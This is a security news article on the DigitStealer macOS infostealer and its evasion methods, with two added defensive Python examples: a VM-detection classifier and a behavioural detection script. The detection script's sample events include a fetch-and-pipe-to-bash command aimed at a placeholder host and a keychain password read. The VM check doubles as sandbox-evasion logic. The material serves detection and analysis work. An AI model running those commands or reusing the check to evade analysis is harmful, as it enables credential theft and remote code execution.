New macOS Threat: DigitStealer Advanced Infostealer Detected by Jamf Threat Labs

Jamf Threat Labs has identified a new and sophisticated macOS threat that is drawing significant attention across the security community. The malicious program, named DigitStealer, is an advanced infostealer designed to run covertly using techniques that make detection extremely difficult. Targeting macOS specifically, this threat demonstrates that attackers are continually raising their technical capabilities to bypass Apple’s security layers.

The new malware, DigitStealer, targets macOS users and employs evasion methods, including in-memory execution and environment checks, that make it hard for traditional signature-based security solutions to spot.

Pontus Nord, Sales Engineer at Jamf – Published by IT-Branschen

Discovery of DigitStealer

Jamf Threat Labs discovered DigitStealer while analyzing a file posing as a legitimate macOS utility called DynamicLake. The fake application mimicked the genuine tool and, at the time of analysis, was flagged by none of the antivirus engines on VirusTotal. This case highlights how quickly threats evolve and why relying solely on conventional, signature-based defenses is insufficient.

A sophisticated infostealer with modular attack flow

DigitStealer belongs to the infostealer family, whose primary goal is to harvest sensitive data from infected machines. Infostealers have increased in prevalence and complexity over the past year. DigitStealer employs multiple layers of technical measures to avoid detection and to bypass macOS protections such as Gatekeeper and other built-in defenses.

A core aspect of DigitStealer’s effectiveness is its modular architecture and stepwise execution. Each stage performs checks to decide whether the next payload should be fetched and activated. For example, DigitStealer conducts hardware checks that can distinguish a physical Mac from an analysis environment. If it finds indicators of a sandbox or virtualized environment, it can simply refrain from activating, so automated detonation produces no malicious behavior to observe and forensic work becomes far more difficult.
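The page does not publish the specific hardware checks DigitStealer performs. The following is an added example, not Jamf's code and not DigitStealer's, that applies the commonly reported virtualization indicators on macOS (the `hw.model` string from `sysctl` and the vendor strings in `ioreg -l` output) so an analyst can see which identifiers a detonation sandbox leaks to a check of this kind. The sample command outputs embedded below are constructed for this example, not captured from real machines.

```python
"""Classify a macOS host as physical or virtual from its hardware identifiers.

Added example (not from Jamf or DigitStealer). Uses widely reported VM vendor
strings; the sample outputs are constructed, not captured from real hosts.
"""
import re
import subprocess
import sys

# Case-insensitive substrings commonly seen in the hardware identifiers of
# macOS virtual machines (VMware Fusion, VirtualBox, Parallels, QEMU/UTM, and
# Apple's own Virtualization framework, which reports VirtualMac2,1).
VM_INDICATORS = ("vmware", "virtualbox", "innotek", "parallels", "qemu",
                 "virtualmac", "apple virtual machine")

# Keys in `ioreg -l` output whose values typically carry vendor strings.
# ioreg prints data properties as  "key" = <"value">  and strings as "key" = "value".
IOREG_KEYS = ("manufacturer", "model", "board-id", "product-name")
_IOREG_RE = re.compile(r'"(%s)" = <?"([^"]*)"' % "|".join(IOREG_KEYS))


def classify_hardware(hw_model: str, ioreg_text: str) -> dict:
    """Return every identifier that looks like a VM, plus an overall verdict."""
    hits = []
    if any(ind in hw_model.lower() for ind in VM_INDICATORS):
        hits.append(f"hw.model={hw_model.strip()}")
    for key, value in _IOREG_RE.findall(ioreg_text):
        if any(ind in value.lower() for ind in VM_INDICATORS):
            hits.append(f"{key}={value}")
    return {"virtual": bool(hits), "indicators": hits}


def classify_live_host() -> dict:
    """Run the real commands on this machine (only meaningful on macOS)."""
    hw_model = subprocess.run(["sysctl", "-n", "hw.model"], capture_output=True,
                              text=True, check=True).stdout
    ioreg = subprocess.run(["ioreg", "-l"], capture_output=True,
                           text=True, check=True).stdout
    return classify_hardware(hw_model, ioreg)


# Constructed sample output for the three cases (not from real machines).
PHYSICAL_SAMPLE = ("MacBookPro18,3\n",
                   '    |   "manufacturer" = <"Apple Inc.">\n'
                   '    |   "model" = <"MacBookPro18,3">\n')
VMWARE_SAMPLE = ("VMware7,1\n",
                 '    |   "manufacturer" = <"VMware, Inc.">\n'
                 '    |   "model" = <"VMware7,1">\n')
APPLE_VM_SAMPLE = ("VirtualMac2,1\n",
                   '    |   "manufacturer" = <"Apple Inc.">\n'
                   '    |   "model" = <"VirtualMac2,1">\n')


if __name__ == "__main__":
    for name, (model, ioreg) in (("physical", PHYSICAL_SAMPLE),
                                 ("vmware", VMWARE_SAMPLE),
                                 ("apple-vm", APPLE_VM_SAMPLE)):
        print(name, classify_hardware(model, ioreg))
    if sys.platform == "darwin":
        print("this host", classify_live_host())
```

If your detonation sandbox returns `virtual: True` here, a sample with this kind of gate may never reach its payload stage; the usual responses are to patch the reported model and manufacturer strings in the VM, or to detonate on physical Apple hardware.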

Threat actors are becoming more sophisticated

Pontus Nord from Jamf outlines the trend clearly. “We see threat actors getting better at blending in, erasing traces, and abusing legitimate services and tools to distribute malware,” he says.

This level of refinement has become more common in the past year. Increasingly, macOS threats run scripts directly in memory and rely on legitimate system APIs and built-in tools rather than dropping custom binaries, so their activity resembles normal user and administrator behavior. The combination of high technical quality and the ability to mimic legitimate activity often means organizations do not discover intrusions until damage has already occurred.

In-memory attacks create serious challenges

One of DigitStealer’s most problematic features is that portions of the attack execute entirely in memory. Because that code is never written to disk, file-scanning, signature-based antivirus has nothing to match against. Attacks that operate only in memory require organizations to employ behavior-based monitoring capable of detecting anomalies in real time. Behavioral indicators such as interpreters spawned with inline scripts, unexpected network connections, and attempts to read credential stores become the critical signals for detecting these threats.
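To make the behavior-based point concrete, here is an added example of the kind of rule that still fires when a payload never touches disk. It is not Jamf's code and is not derived from DigitStealer's actual behavior; the event format (JSON lines with `pid`, `parent` and `argv`) and the sample events are constructed for this example and do not follow any vendor's telemetry schema. The three rules flag interpreters launched from an application bundle with an inline script, download-and-pipe-to-interpreter command lines, and command lines that touch the keychain.

```python
"""Behaviour-based triage of macOS process-execution events.

Added example (not Jamf's code, not DigitStealer's real behaviour). The event
schema and the sample events are constructed for illustration.
"""
import json
import re
from dataclasses import dataclass

INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python3", "perl"}
INLINE_FLAGS = {"-c", "-e"}            # inline script: nothing to scan on disk
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(bash|sh|zsh|osascript)\b")
KEYCHAIN_HINTS = ("library/keychains", "find-generic-password",
                  "dump-keychain", "login.keychain")


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def from_app_bundle(path: str) -> bool:
    """True when the parent executable lives inside a .app bundle."""
    return "/Contents/MacOS/" in path


def evaluate(event: dict) -> list:
    """Apply the three behavioural rules to one exec event."""
    argv = event.get("argv", [])
    exe = argv[0].rsplit("/", 1)[-1] if argv else ""
    cmdline = " ".join(argv)
    parent = event.get("parent", "")
    pid = event.get("pid", 0)
    findings = []
    # Rule 1: an app bundle spawning an interpreter with an inline script.
    if exe in INTERPRETERS and from_app_bundle(parent) and INLINE_FLAGS & set(argv[1:]):
        findings.append(Finding("inline-script-from-app", pid, cmdline))
    # Rule 2: fetch a script over the network and feed it straight to a shell.
    if PIPE_TO_SHELL.search(cmdline):
        findings.append(Finding("download-pipe-to-interpreter", pid, cmdline))
    # Rule 3: command line touches the keychain (credential-store access).
    if any(h in cmdline.lower() for h in KEYCHAIN_HINTS):
        findings.append(Finding("credential-store-access", pid, cmdline))
    return findings


def triage(lines) -> list:
    """Evaluate a sequence of JSON-line events and collect all findings."""
    out = []
    for line in lines:
        out.extend(evaluate(json.loads(line)))
    return out


# Constructed sample events. FakeUtility.app and example.invalid are placeholders.
SAMPLE_EVENTS = [
    '{"pid": 401, "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", '
    '"argv": ["/bin/zsh", "-l"]}',
    '{"pid": 402, "parent": "/Applications/FakeUtility.app/Contents/MacOS/FakeUtility", '
    '"argv": ["/bin/bash", "-c", "curl -fsSL http://example.invalid/stage2.sh | bash"]}',
    '{"pid": 403, "parent": "/bin/bash", '
    '"argv": ["/usr/bin/security", "find-generic-password", "-ga", "user"]}',
    '{"pid": 404, "parent": "/usr/sbin/cron", '
    '"argv": ["/usr/bin/python3", "/usr/local/bin/backup.py"]}',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.rule:32} pid={f.pid}  {f.detail}")
```

The first rule is deliberately broad: many legitimate apps run `osascript -e` for dialogs, so in practice it is a scoring signal combined with the process tree and subsequent network or keychain activity, not a standalone block rule. The interactive `zsh -l` from Terminal and the cron-launched script produce no findings.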

macOS is increasingly attractive to cybercriminals

DigitStealer also reflects a broader trend: macOS has become a more attractive platform for cybercriminals. Organizations that once focused mainly on Windows environments are finding that attackers increasingly prioritize macOS as Windows security improves. As more creators, developers, and enterprise users work on Macs, the value of the credentials and data on those devices has grown.

Recommendations from Jamf

Jamf offers several recommendations to strengthen defenses. Organizations should ensure that advanced threat controls and blocking capabilities are enabled in their security stack, not merely alerting. Tools that rely solely on signatures or basic heuristics will not be sufficient against threats like DigitStealer. Companies should also exercise caution when installing software from unknown or unofficial sources, since social engineering and fake apps, such as the DynamicLake look-alike used here, remain common distribution methods for this kind of malware.

Organizations should adopt a layered approach combining preventative protections with behavior-based detection. While defense-in-depth remains relevant, it must be augmented with real-time monitoring and analytics engines that can detect subtle signs of compromise. This is especially important in environments where users have administrative privileges or where third-party tools are installed outside centrally approved channels.

The threat posed by DigitStealer is a clear reminder that macOS environments can no longer be considered less vulnerable. Attackers are investing substantial resources into developing specialized malware for the Apple ecosystem, so organizations must apply the same security standards to macOS as they do to Windows and Linux.

Read the full analysis from Jamf Threat Labs: